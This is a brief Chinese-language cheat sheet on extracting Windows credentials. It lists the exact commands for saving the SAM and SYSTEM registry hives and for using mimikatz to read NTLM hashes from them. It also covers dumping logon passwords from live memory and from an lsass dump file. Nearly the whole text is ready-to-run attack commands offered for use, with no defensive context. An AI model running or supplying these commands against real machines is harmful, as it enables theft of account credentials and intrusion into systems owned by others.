使用SAM和System文件抓取密码
导出sam和system文件抓取密码
reg save hklm\sam sam.hive
reg save hklm\system system.hive
使用mimikatz读取sam和system文件来获得NTLM Hash
lsadump::sam /sam:sam.hive /system:system.hive
使用mimikatz直接读取本地sam文件。
调成debug模式:privilege::debug
将权限提升至system:token::elevate
直接读取SAM文件:lsadump::sam
使用mimikatz在线读取SAM文件
不需要先运行mimikatz:
mimikatz "privilege::debug" "log" "sekurlsa::logonpasswords
mimikatz离线读取lsass.dump
需要先获得lsass的转储文件
使用mimikatz导出lsass.dump文件中的密码散列值
载入dump文件: sekurlsa::minidump lsass.DMP
导出密码: sekurlsa::logonPasswords full